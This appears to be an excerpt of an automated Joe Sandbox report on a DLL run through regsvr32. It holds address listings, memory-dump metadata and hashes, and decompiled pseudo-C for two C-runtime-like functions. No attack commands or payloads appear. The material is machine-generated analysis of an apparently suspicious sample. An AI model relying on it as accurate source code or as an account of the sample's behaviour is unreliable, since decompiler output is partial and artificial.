                                                                      0x180031e8a
                                                                      0x180031e93
                                                                      0x180031ea2
                                                                      0x180031eac
                                                                      0x180031eaf
                                                                      0x180031eb9
                                                                      0x180031ebd
                                                                      0x180031ec1
                                                                      0x180031ec4
                                                                      0x180031ecb
                                                                      0x180031ed4
                                                                      0x180031ede
                                                                      0x180031ee6
                                                                      0x180031eeb
                                                                      0x180031ef0
                                                                      0x180031efc
                                                                      0x180031f05
                                                                      0x180031f10
                                                                      0x180031f22
                                                                      0x180031f24
                                                                      0x180031f2a
                                                                      0x180031f30
                                                                      0x180031f35
                                                                      0x180031f39
                                                                      0x180031f43
                                                                      0x180031f45
                                                                      0x180031f4e
                                                                      0x180031f51
                                                                      0x180031f55
                                                                      0x180031f5a
                                                                      0x180031f5f
                                                                      0x180031f64
                                                                      0x180031f6c
                                                                      0x180031f6e
                                                                      0x180031f78
                                                                      0x180031f81
                                                                      0x180031f85
                                                                      0x180031f8e
                                                                      0x180031f94
                                                                      0x180031f97
                                                                      0x180031f9d
                                                                      0x180031fab
                                                                      0x180031fb4
                                                                      0x180031fbe
                                                                      0x180031fc0
                                                                      0x180031fd2
                                                                      0x180031fd7
                                                                      0x180031fdd
                                                                      0x180031fe2
                                                                      0x180031fe6
                                                                      0x180031fee
                                                                      0x180031ff7
                                                                      0x180032003
                                                                      0x180032007
                                                                      0x18003200b
                                                                      0x18003200f
                                                                      0x180032012
                                                                      0x18003201f
                                                                      0x180032023
                                                                      0x180032032
                                                                      0x180032037
                                                                      0x180032039
                                                                      0x180032048
                                                                      0x18003204e
                                                                      0x18003205c
                                                                      0x180032060
                                                                      0x180032067
                                                                      0x180032069
                                                                      0x180032072
                                                                      0x180032079
                                                                      0x18003207d
                                                                      0x180032083
                                                                      0x18003208b
                                                                      0x18003208f
                                                                      0x180032094
                                                                      0x18003209e
                                                                      0x1800320a5
                                                                      0x1800320a8
                                                                      0x1800320ba
                                                                      0x1800320c9
                                                                      0x1800320d8
                                                                      0x1800320e3
                                                                      0x1800320f0
                                                                      0x180032102
                                                                      0x180032108
                                                                      0x180032110
                                                                      0x180032117
                                                                      0x180032121
                                                                      0x180032126
                                                                      0x18003212a
                                                                      0x180032130
                                                                      0x180032135
                                                                      0x180032141
                                                                      0x180032146
                                                                      0x180032153
                                                                      0x180032158
                                                                      0x180032163
                                                                      0x180032168
                                                                      0x18003216b
                                                                      0x180032172
                                                                      0x180032177
                                                                      0x18003217e
                                                                      0x180032182
                                                                      0x18003218f
                                                                      0x1800321a0
                                                                      0x1800321ab
                                                                      0x1800321ad
                                                                      0x1800321b0
                                                                      0x1800321b3
                                                                      0x1800321b5
                                                                      0x1800321bb
                                                                      0x1800321bf
                                                                      0x1800321c7
                                                                      0x1800321ca
                                                                      0x1800321ce
                                                                      0x1800321d1
                                                                      0x1800321db
                                                                      0x1800321dd
                                                                      0x1800321ec
                                                                      0x1800321f6
                                                                      0x180032200
                                                                      0x180032206
                                                                      0x18003220b
                                                                      0x180032217
                                                                      0x18003221c
                                                                      0x180032225
                                                                      0x180032228
                                                                      0x180032235
                                                                      0x18003223a
                                                                      0x18003223c
                                                                      0x18003224b
                                                                      0x180032255
                                                                      0x18003225f
                                                                      0x180032265
                                                                      0x18003226a
                                                                      0x18003226f
                                                                      0x180032276
                                                                      0x180032280
                                                                      0x18003228f
                                                                      0x180032295
                                                                      0x1800322a2
                                                                      0x1800322ae
                                                                      0x1800322b0
                                                                      0x1800322b8
                                                                      0x1800322bc
                                                                      0x1800322c7
                                                                      0x1800322cc
                                                                      0x1800322d7
                                                                      0x1800322de
                                                                      0x1800322e1
                                                                      0x1800322e6
                                                                      0x1800322f3
                                                                      0x1800322f8
                                                                      0x1800322fb
                                                                      0x180032304
                                                                      0x180032311
                                                                      0x18003231d
                                                                      0x18003232b
                                                                      0x18003232d
                                                                      0x180032336
                                                                      0x18003233b
                                                                      0x180032352
                                                                      0x180032354
                                                                      0x180032361
                                                                      0x180032366
                                                                      0x180032368
                                                                      0x180032372
                                                                      0x180032377
                                                                      0x180032389
                                                                      0x180032392
                                                                      0x18003239f
                                                                      0x1800323a4
                                                                      0x1800323b6
                                                                      0x1800323b8
                                                                      0x1800323c5
                                                                      0x1800323ca
                                                                      0x1800323cc
                                                                      0x1800323d6
                                                                      0x1800323db
                                                                      0x1800323ed
                                                                      0x1800323f6
                                                                      0x180032400
                                                                      0x180032405
                                                                      0x180032417
                                                                      0x18003241b
                                                                      0x180032428
                                                                      0x180032431
                                                                      0x18003243c
                                                                      0x18003243f
                                                                      0x180032446
                                                                      0x18003244e
                                                                      0x180032456
                                                                      0x18003245b
                                                                      0x180032464
                                                                      0x180032469
                                                                      0x18003246e
                                                                      0x180032477
                                                                      0x180032482
                                                                      0x18003248d
                                                                      0x180032497
                                                                      0x18003249c
                                                                      0x1800324a4
                                                                      0x1800324a6
                                                                      0x1800324ad
                                                                      0x1800324b5
                                                                      0x1800324bf
                                                                      0x1800324c9
                                                                      0x1800324cc
                                                                      0x1800324d2
                                                                      0x1800324de
                                                                      0x1800324e1
                                                                      0x1800324ee
                                                                      0x1800324f2
                                                                      0x180032502
                                                                      0x180032507
                                                                      0x180032516
                                                                      0x180032520
                                                                      0x180032525
                                                                      0x18003252c
                                                                      0x18003252f
                                                                      0x180032536
                                                                      0x180032543
                                                                      0x180032549
                                                                      0x18003254c
                                                                      0x180032552
                                                                      0x18003255a
                                                                      0x18003255d
                                                                      0x18003255f
                                                                      0x18003256f
                                                                      0x180032577
                                                                      0x18003257a
                                                                      0x180032590
                                                                      0x180032594
                                                                      0x180032596
                                                                      0x1800325a5
                                                                      0x1800325af
                                                                      0x1800325b9
                                                                      0x1800325bf
                                                                      0x1800325c4
                                                                      0x1800325d6
                                                                      0x1800325da
                                                                      0x1800325e3
                                                                      0x1800325eb
                                                                      0x1800325f5
                                                                      0x1800325ff
                                                                      0x180032605
                                                                      0x18003260a
                                                                      0x180032619
                                                                      0x18003261d
                                                                      0x180032626
                                                                      0x18003262e
                                                                      0x180032633
                                                                      0x18003263f
                                                                      0x180032647
                                                                      0x18003264d
                                                                      0x18003265e
                                                                      0x180032662
                                                                      0x180032671
                                                                      0x180032675
                                                                      0x180032677
                                                                      0x180032682
                                                                      0x180032689
                                                                      0x18003269d
                                                                      0x1800326a2
                                                                      0x1800326a7
                                                                      0x1800326b0
                                                                      0x1800326bc
                                                                      0x1800326c7
                                                                      0x1800326cc
                                                                      0x1800326d6
                                                                      0x1800326dc
                                                                      0x1800326df
                                                                      0x1800326e2
                                                                      0x1800326e8
                                                                      0x1800326ee
                                                                      0x1800326fb
                                                                      0x180032709
                                                                      0x18003270f
                                                                      0x18003271b
                                                                      0x18003271e
                                                                      0x180032720
                                                                      0x180032722
                                                                      0x180032731
                                                                      0x18003273b
                                                                      0x180032745
                                                                      0x18003274b
                                                                      0x18003275d
                                                                      0x180032767
                                                                      0x180032770
                                                                      0x180032777
                                                                      0x180032779
                                                                      0x18003277f
                                                                      0x180032781
                                                                      0x180032785
                                                                      0x180032787
                                                                      0x180032792
                                                                      0x18003279a
                                                                      0x18003279c
                                                                      0x1800327a8
                                                                      0x1800327b2
                                                                      0x1800327bc
                                                                      0x1800327c2
                                                                      0x1800327d4
                                                                      0x1800327de
                                                                      0x1800327e7
                                                                      0x1800327f1
                                                                      0x1800327fe
                                                                      0x180032808
                                                                      0x18003280e
                                                                      0x180032817
                                                                      0x18003281a
                                                                      0x18003281c
                                                                      0x180032825
                                                                      0x18003282d
                                                                      0x180032831
                                                                      0x18003283c
                                                                      0x180032849
                                                                      0x18003284c
                                                                      0x18003284e
                                                                      0x180032857
                                                                      0x18003285c
                                                                      0x180032860
                                                                      0x180032867
                                                                      0x180032870
                                                                      0x180032873
                                                                      0x180032875
                                                                      0x18003287e
                                                                      0x180032883
                                                                      0x18003288d
                                                                      0x180032897
                                                                      0x18003289d
                                                                      0x1800328af
                                                                      0x1800328b9
                                                                      0x1800328be
                                                                      0x1800328c2
                                                                      0x1800328c8
                                                                      0x1800328d6
                                                                      0x1800328d8
                                                                      0x1800328e2
                                                                      0x1800328e4
                                                                      0x1800328f0
                                                                      0x1800328fa
                                                                      0x180032904
                                                                      0x18003290a
                                                                      0x18003291c
                                                                      0x180032926
                                                                      0x18003292f
                                                                      0x180032933
                                                                      0x180032937
                                                                      0x180032939
                                                                      0x180032945
                                                                      0x18003294f
                                                                      0x180032959
                                                                      0x18003295f
                                                                      0x180032971
                                                                      0x18003297b
                                                                      0x180032984
                                                                      0x18003298d
                                                                      0x180032990
                                                                      0x180032994
                                                                      0x1800329b4

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: /$[thunk]:$`adjustor{$`local static destructor helper'$`template static data member constructor helper'$`template static data member destructor helper'$`vtordispex{$`vtordisp{$extern "C" $private: $protected: $public: $static $virtual $}'
                                                                      • API String ID: 2943138195-2884338863
                                                                      • Opcode ID: 0bbebdef9fe5bdbaf984ee847f6e4fb1965792cfa1af951e54ef7016faa8b8bf
                                                                      • Instruction ID: 3195c548c06544c4cf7a64450c0519c0b0cf5d08965581c89048bc050a0e1514
                                                                      • Opcode Fuzzy Hash: 0bbebdef9fe5bdbaf984ee847f6e4fb1965792cfa1af951e54ef7016faa8b8bf
                                                                      • Instruction Fuzzy Hash: CA92977261878986EB83CF54E4813DEB7A0F78D3D4F509116FA8A47A99DF78C648CB40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 68%
                                                                      			E000000011800498EC(void* __edx, void* __rbx, unsigned int __rcx, void* __rdi, void* __rsi, long long __r9, signed int __r10, void* __r12, void* __r14, void* __r15) {
                                                                      				signed long long _t32;
                                                                      				void* _t43;
                                                                      				void* _t45;
                                                                      				void* _t46;
                                                                      				signed long long _t47;
                                                                      				long long _t54;
                                                                      
                                                                      				_t43 = __rdi;
                                                                      				_t45 = _t46 - 0x6e0;
                                                                      				_t47 = _t46 - 0x7e0;
                                                                      				_t32 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t45 + 0x6d0) = _t32 ^ _t47;
                                                                      				_t54 =  *((intOrPtr*)(_t45 + 0x740));
                                                                      				 *(_t47 + 0x30) = __rcx;
                                                                      				 *((long long*)(_t47 + 0x78)) = _t54;
                                                                      				 *((long long*)(_t45 - 0x78)) = __r9;
                                                                      				 *((intOrPtr*)(_t47 + 0x74)) = r8d;
                                                                      				E00000001180058A60(_t47 + 0x60);
                                                                      				r15d = 1;
                                                                      				if (( *(_t47 + 0x60) & 0x0000001f) != 0x1f) goto 0x80049958;
                                                                      				 *((char*)(_t47 + 0x68)) = 0;
                                                                      				goto 0x80049967;
                                                                      				E00000001180058ACC(( *(_t47 + 0x60) & 0x0000001f) - 0x1f, _t47 + 0x60);
                                                                      				 *((intOrPtr*)(_t47 + 0x68)) = r15b;
                                                                      				 *((long long*)(__r9 + 8)) = _t54;
                                                                      				_t15 = _t43 + 0xd; // 0x2d
                                                                      				_t22 =  <  ? _t15 : 0x20;
                                                                      				r8d = 0;
                                                                      				 *((intOrPtr*)(__r9)) =  <  ? _t15 : 0x20;
                                                                      				E000000011800589FC(0, _t32 ^ _t47, _t47 + 0x70);
                                                                      				r10d = 0x7ff;
                                                                      				if (( *(_t47 + 0x30) >> 0x00000034 & __r10) != 0) goto 0x800499d2;
                                                                      			}









                                                                      0x1800498ec
                                                                      0x1800498f7
                                                                      0x1800498ff
                                                                      0x180049906
                                                                      0x180049910
                                                                      0x180049917
                                                                      0x180049921
                                                                      0x18004992d
                                                                      0x180049932
                                                                      0x180049936
                                                                      0x18004993b
                                                                      0x180049944
                                                                      0x18004994f
                                                                      0x180049951
                                                                      0x180049956
                                                                      0x18004995d
                                                                      0x180049962
                                                                      0x180049973
                                                                      0x18004997b
                                                                      0x18004997e
                                                                      0x180049981
                                                                      0x180049986
                                                                      0x18004998f
                                                                      0x180049997
                                                                      0x1800499ae

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo$memcpy_s$fegetenv
                                                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN$MZx
                                                                      • API String ID: 808467561-2638907429
                                                                      • Opcode ID: fe7a42cd3587f6b3c0e61655d9b7992fefca3b4e848e1f214e6e70ad065f3313
                                                                      • Instruction ID: 3fdb4e27e26717c1d5b3d9abff0955ab65b09a7ea8d1424c4cc65fc014c545a8
                                                                      • Opcode Fuzzy Hash: fe7a42cd3587f6b3c0e61655d9b7992fefca3b4e848e1f214e6e70ad065f3313
                                                                      • Instruction Fuzzy Hash: 1CB2E3726156888BF7A6CF64D9807ED37A1F3493CCF519129EA0667A84DF34CB08CB48
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 87%
                                                                      			E0000000118004B380(void* __ebx, signed int __edx, long long __rbx, signed int __rcx, void* __r9) {
                                                                      				void* __rsi;
                                                                      				unsigned int _t127;
                                                                      				void* _t142;
                                                                      				void* _t169;
                                                                      				unsigned int _t176;
                                                                      				unsigned int _t185;
                                                                      				unsigned int _t196;
                                                                      				intOrPtr _t200;
                                                                      				unsigned int _t202;
                                                                      				void* _t220;
                                                                      				signed long long _t238;
                                                                      				signed long long _t239;
                                                                      				signed long long _t242;
                                                                      				signed long long _t255;
                                                                      				signed long long _t263;
                                                                      				signed long long _t269;
                                                                      				void* _t275;
                                                                      				signed long long _t277;
                                                                      				signed long long _t279;
                                                                      				void* _t282;
                                                                      				void* _t283;
                                                                      				void* _t285;
                                                                      				signed long long _t286;
                                                                      				signed long long _t298;
                                                                      				signed long long _t301;
                                                                      				void* _t305;
                                                                      				signed long long _t307;
                                                                      				signed long long _t312;
                                                                      				void* _t313;
                                                                      				void* _t317;
                                                                      				void* _t319;
                                                                      				void* _t322;
                                                                      				signed long long _t323;
                                                                      
                                                                      				_t305 = __r9;
                                                                      				 *((long long*)(_t285 + 0x18)) = __rbx;
                                                                      				_t283 = _t285 - 0x4c0;
                                                                      				_t286 = _t285 - 0x5c0;
                                                                      				_t238 =  *0x80072078; // 0xc949cbcab002
                                                                      				_t239 = _t238 ^ _t286;
                                                                      				 *(_t283 + 0x4b0) = _t239;
                                                                      				r8d = __edx;
                                                                      				 *(_t286 + 0x2c) = __edx;
                                                                      				r12d = 0;
                                                                      				_t127 = 0xcccccccd * __edx >> 0x20 >> 3;
                                                                      				 *(_t286 + 0x28) = _t127;
                                                                      				r15d = _t127;
                                                                      				 *(_t286 + 0x20) = _t127;
                                                                      				if (_t127 == 0) goto 0x8004b800;
                                                                      				r13d = r15d;
                                                                      				r13d =  >  ? 0x26 : r13d;
                                                                      				 *(_t286 + 0x24) = r13d;
                                                                      				_t277 = 0x639b0 + _t239 * 4 + 0x180000000;
                                                                      				 *(_t283 + 0x2e0) = _t279 + __rcx;
                                                                      				E000000011800051C0(_t279 + __rcx, 0, _t283 + 0x2e4, 0x180000000, __rcx * 4);
                                                                      				_t280 = _t279 << 2;
                                                                      				_t263 = 0x1800630a0 + _t239 * 4;
                                                                      				E00000001180004B10();
                                                                      				if ( *(_t283 + 0x2e0) - 1 > 0) goto 0x8004b538;
                                                                      				if ( *((intOrPtr*)(_t283 + 0x2e4)) != 0) goto 0x8004b4a6;
                                                                      				 *(_t283 + 0x110) = r12d;
                                                                      				r9d = 0;
                                                                      				 *__rcx = r12d;
                                                                      				E00000001180049864(0x1cc, _t239, __rcx * 4, __rcx + 4, _t263, _t279 << 2, _t283 + 0x114, _t305, _t322);
                                                                      				goto 0x8004b7ce;
                                                                      				if (1 == 1) goto 0x8004b7ce;
                                                                      				r10d =  *__rcx;
                                                                      				if (r10d != 0) goto 0x8004b4be;
                                                                      				goto 0x8004b7ce;
                                                                      				r8d = r12d;
                                                                      				r9d = r12d;
                                                                      				_t242 = _t239;
                                                                      				r9d = r9d + 1;
                                                                      				_t265 = _t263 * _t242 + _t239;
                                                                      				if (r9d != r10d) goto 0x8004b4d0;
                                                                      				if (r8d == 0) goto 0x8004b49f;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004b512;
                                                                      				 *(__rcx + 4 + _t239 * 4) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004b7ce;
                                                                      				r9d = 0;
                                                                      				 *(_t283 + 0x2e0) = r12d;
                                                                      				 *__rcx = r12d;
                                                                      				_t142 = E00000001180049864(0x1cc, _t239, _t242, __rcx + 4, _t263 * _t242 + _t239, _t279 << 2, _t283 + 0x2e4, _t305, _t319);
                                                                      				goto 0x8004b7cc;
                                                                      				_t202 =  *__rcx;
                                                                      				_t323 = __rcx + 4;
                                                                      				if (_t202 - 1 > 0) goto 0x8004b624;
                                                                      				_t169 =  *_t323;
                                                                      				 *__rcx = _t142;
                                                                      				_t307 = _t239 << 2;
                                                                      				E00000001180049864(0x1cc, _t239, _t242, _t323, _t263 * _t242 + _t239, _t279 << 2, _t283 + 0x2e4, _t307, _t317);
                                                                      				if (_t169 != 0) goto 0x8004b59a;
                                                                      				r9d = 0;
                                                                      				 *(_t283 + 0x2e0) = r12d;
                                                                      				 *__rcx = r12d;
                                                                      				E00000001180049864(0x1cc, _t239, _t242, _t323, _t263 * _t242 + _t239, _t279 << 2, _t283 + 0x2e4, _t307, _t313);
                                                                      				r15d =  *(_t286 + 0x20);
                                                                      				goto 0x8004b7ce;
                                                                      				if (_t169 == 1) goto 0x8004b58e;
                                                                      				r10d =  *__rcx;
                                                                      				if (r10d == 0) goto 0x8004b58e;
                                                                      				r8d = r12d;
                                                                      				r9d = r12d;
                                                                      				_t312 = _t242;
                                                                      				r9d = r9d + 1;
                                                                      				if (r9d != r10d) goto 0x8004b5b0;
                                                                      				if (r8d == 0) goto 0x8004b58e;
                                                                      				if ( *__rcx - 0x73 >= 0) goto 0x8004b5f7;
                                                                      				r15d =  *(_t286 + 0x20);
                                                                      				 *(__rcx + 4 + _t239 * 4) = r8d;
                                                                      				 *__rcx =  *__rcx + 1;
                                                                      				goto 0x8004b7ce;
                                                                      				r9d = 0;
                                                                      				 *(_t283 + 0x2e0) = r12d;
                                                                      				_t298 = _t283 + 0x2e4;
                                                                      				 *__rcx = r12d;
                                                                      				_t255 = _t323;
                                                                      				E00000001180049864(0x1cc, _t239, _t242, _t255, _t265 * _t312 + _t239, _t280, _t298, _t307, _t275);
                                                                      				r15d =  *(_t286 + 0x20);
                                                                      				goto 0x8004b7ce;
                                                                      				_t220 = 0 - _t202;
                                                                      				if (_t220 < 0) goto 0x8004b635;
                                                                      				_t269 = _t323;
                                                                      				 *(_t286 + 0x30) = _t269;
                                                                      				if (( *(_t277 + 2) & 0 | _t220 > 0x00000000) == 0) goto 0x8004b657;
                                                                      				 *(_t283 + 0x110) = r12d;
                                                                      				r13d = 0;
                                                                      				if (0 == 0) goto 0x8004b773;
                                                                      				goto 0x8004b66b;
                                                                      				r13d = _t202;
                                                                      				 *(_t283 + 0x110) = 0;
                                                                      				_t200 =  *((intOrPtr*)(_t269 + _t242 * 4));
                                                                      				if (_t200 != 0) goto 0x8004b694;
                                                                      				if (0 != 0) goto 0x8004b768;
                                                                      				_t67 = _t242 + 1; // 0x1
                                                                      				_t176 = _t67;
                                                                      				 *((intOrPtr*)(_t283 + 0x114 + _t242 * 4)) = _t200;
                                                                      				 *(_t283 + 0x110) = _t176;
                                                                      				goto 0x8004b768;
                                                                      				r10d = 0;
                                                                      				if (0 == 0) goto 0x8004b75e;
                                                                      				r11d = 0;
                                                                      				r11d =  ~r11d;
                                                                      				if (0 == 0x73) goto 0x8004b704;
                                                                      				r9d = 0;
                                                                      				if (0 != _t176) goto 0x8004b6c8;
                                                                      				_t72 = _t239 + 1; // 0x1
                                                                      				 *(_t283 + 0x114 + _t307 * 4) = 0;
                                                                      				 *(_t283 + 0x110) = _t72;
                                                                      				r8d =  *(_t283 + 0x2e4 + _t255 * 4);
                                                                      				_t301 = _t298 * _t277 + _t255 + _t255;
                                                                      				 *(_t283 + 0x114 + _t307 * 4) = r8d;
                                                                      				if (_t312 + _t239 != 0) goto 0x8004b6a7;
                                                                      				if (r10d == 0) goto 0x8004b75e;
                                                                      				if (1 == 0x73) goto 0x8004b7a2;
                                                                      				r8d = 1;
                                                                      				if (1 !=  *(_t283 + 0x110)) goto 0x8004b735;
                                                                      				_t88 = _t239 + 1; // 0x1
                                                                      				 *(_t283 + 0x114 + _t301 * 4) = 0;
                                                                      				 *(_t283 + 0x110) = _t88;
                                                                      				_t196 =  *(_t283 + 0x114 + _t301 * 4);
                                                                      				 *(_t283 + 0x114 + _t301 * 4) = _t196;
                                                                      				_t185 =  *(_t283 + 0x110);
                                                                      				r10d = _t196;
                                                                      				if (_t196 != 0) goto 0x8004b710;
                                                                      				if (2 == 0x73) goto 0x8004b7a2;
                                                                      				if (1 != r13d) goto 0x8004b670;
                                                                      				r9d = _t185;
                                                                      				 *__rcx = _t185;
                                                                      				E00000001180049864(0x1cc, _t239, _t242, _t323,  *(_t286 + 0x30), _t280, _t283 + 0x114, _t307 << 2, _t279);
                                                                      				r15d =  *(_t286 + 0x20);
                                                                      				r13d =  *(_t286 + 0x24);
                                                                      				r12d = 0;
                                                                      				goto 0x8004b7ce;
                                                                      				r12d = 0;
                                                                      				r9d = 0;
                                                                      				 *(_t286 + 0x40) = r12d;
                                                                      				 *__rcx = r12d;
                                                                      				E00000001180049864(0x1cc, _t239, _t242, _t323,  *(_t286 + 0x30), _t280, _t286 + 0x44, _t307 << 2, _t282);
                                                                      				r15d =  *(_t286 + 0x20);
                                                                      				r13d =  *(_t286 + 0x24);
                                                                      				if (0 == 0) goto 0x8004b863;
                                                                      				r15d = r15d - r13d;
                                                                      				 *(_t286 + 0x20) = r15d;
                                                                      				if (0 != 0) goto 0x8004b3f0;
                                                                      				r8d =  *(_t286 + 0x2c);
                                                                      				r8d = r8d - _t239 + _t239 * 4 + _t239 + _t239 * 4;
                                                                      				if (0 == 0) goto 0x8004b837;
                                                                      				if ( *((intOrPtr*)(0x180000000 + 0x63a48 + _t239 * 4)) != 0) goto 0x8004b885;
                                                                      				 *(_t286 + 0x40) = r12d;
                                                                      				r9d = 0;
                                                                      				 *__rcx = r12d;
                                                                      				E00000001180049864(0x1cc, _t239, _t242, __rcx + 4, 0x180000000, _t280, _t286 + 0x44, _t307 << 2);
                                                                      				return E00000001180002FB0(1, _t185,  *(_t283 + 0x4b0) ^ _t286);
                                                                      			}




































                                                                      0x18004b380
                                                                      0x18004b380
                                                                      0x18004b390
                                                                      0x18004b398
                                                                      0x18004b39f
                                                                      0x18004b3a6
                                                                      0x18004b3a9
                                                                      0x18004b3b0
                                                                      0x18004b3b3
                                                                      0x18004b3bc
                                                                      0x18004b3cd
                                                                      0x18004b3d0
                                                                      0x18004b3d4
                                                                      0x18004b3d7
                                                                      0x18004b3dd
                                                                      0x18004b3f4
                                                                      0x18004b3f7
                                                                      0x18004b3fb
                                                                      0x18004b40c
                                                                      0x18004b42e
                                                                      0x18004b434
                                                                      0x18004b44a
                                                                      0x18004b45b
                                                                      0x18004b45f
                                                                      0x18004b46d
                                                                      0x18004b47b
                                                                      0x18004b481
                                                                      0x18004b488
                                                                      0x18004b48b
                                                                      0x18004b49a
                                                                      0x18004b4a1
                                                                      0x18004b4a9
                                                                      0x18004b4af
                                                                      0x18004b4b5
                                                                      0x18004b4b9
                                                                      0x18004b4c2
                                                                      0x18004b4c5
                                                                      0x18004b4c8
                                                                      0x18004b4d3
                                                                      0x18004b4e5
                                                                      0x18004b4f4
                                                                      0x18004b4f9
                                                                      0x18004b501
                                                                      0x18004b503
                                                                      0x18004b50a
                                                                      0x18004b50d
                                                                      0x18004b512
                                                                      0x18004b515
                                                                      0x18004b523
                                                                      0x18004b52e
                                                                      0x18004b533
                                                                      0x18004b538
                                                                      0x18004b53b
                                                                      0x18004b542
                                                                      0x18004b548
                                                                      0x18004b555
                                                                      0x18004b558
                                                                      0x18004b564
                                                                      0x18004b56b
                                                                      0x18004b56d
                                                                      0x18004b570
                                                                      0x18004b57e
                                                                      0x18004b589
                                                                      0x18004b58e
                                                                      0x18004b595
                                                                      0x18004b59d
                                                                      0x18004b59f
                                                                      0x18004b5a5
                                                                      0x18004b5a7
                                                                      0x18004b5aa
                                                                      0x18004b5ad
                                                                      0x18004b5b3
                                                                      0x18004b5d4
                                                                      0x18004b5d9
                                                                      0x18004b5e1
                                                                      0x18004b5e3
                                                                      0x18004b5e8
                                                                      0x18004b5ef
                                                                      0x18004b5f2
                                                                      0x18004b5f7
                                                                      0x18004b5fa
                                                                      0x18004b601
                                                                      0x18004b608
                                                                      0x18004b610
                                                                      0x18004b613
                                                                      0x18004b618
                                                                      0x18004b61f
                                                                      0x18004b624
                                                                      0x18004b630
                                                                      0x18004b632
                                                                      0x18004b635
                                                                      0x18004b63c
                                                                      0x18004b644
                                                                      0x18004b64a
                                                                      0x18004b64f
                                                                      0x18004b655
                                                                      0x18004b660
                                                                      0x18004b663
                                                                      0x18004b670
                                                                      0x18004b675
                                                                      0x18004b679
                                                                      0x18004b67f
                                                                      0x18004b67f
                                                                      0x18004b682
                                                                      0x18004b689
                                                                      0x18004b68f
                                                                      0x18004b694
                                                                      0x18004b69b
                                                                      0x18004b6a1
                                                                      0x18004b6a4
                                                                      0x18004b6aa
                                                                      0x18004b6ac
                                                                      0x18004b6b1
                                                                      0x18004b6b3
                                                                      0x18004b6b6
                                                                      0x18004b6c2
                                                                      0x18004b6ce
                                                                      0x18004b6e4
                                                                      0x18004b6ee
                                                                      0x18004b702
                                                                      0x18004b707
                                                                      0x18004b713
                                                                      0x18004b719
                                                                      0x18004b71e
                                                                      0x18004b720
                                                                      0x18004b723
                                                                      0x18004b72f
                                                                      0x18004b735
                                                                      0x18004b745
                                                                      0x18004b74d
                                                                      0x18004b757
                                                                      0x18004b75c
                                                                      0x18004b761
                                                                      0x18004b76d
                                                                      0x18004b773
                                                                      0x18004b77d
                                                                      0x18004b78c
                                                                      0x18004b791
                                                                      0x18004b798
                                                                      0x18004b79d
                                                                      0x18004b7a0
                                                                      0x18004b7a2
                                                                      0x18004b7aa
                                                                      0x18004b7ad
                                                                      0x18004b7b7
                                                                      0x18004b7bd
                                                                      0x18004b7c2
                                                                      0x18004b7c7
                                                                      0x18004b7d0
                                                                      0x18004b7d6
                                                                      0x18004b7e0
                                                                      0x18004b7ea
                                                                      0x18004b7fb
                                                                      0x18004b805
                                                                      0x18004b808
                                                                      0x18004b817
                                                                      0x18004b81d
                                                                      0x18004b822
                                                                      0x18004b825
                                                                      0x18004b832
                                                                      0x18004b862

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: memcpy_s
                                                                      • String ID: MZx
                                                                      • API String ID: 1502251526-2575928145
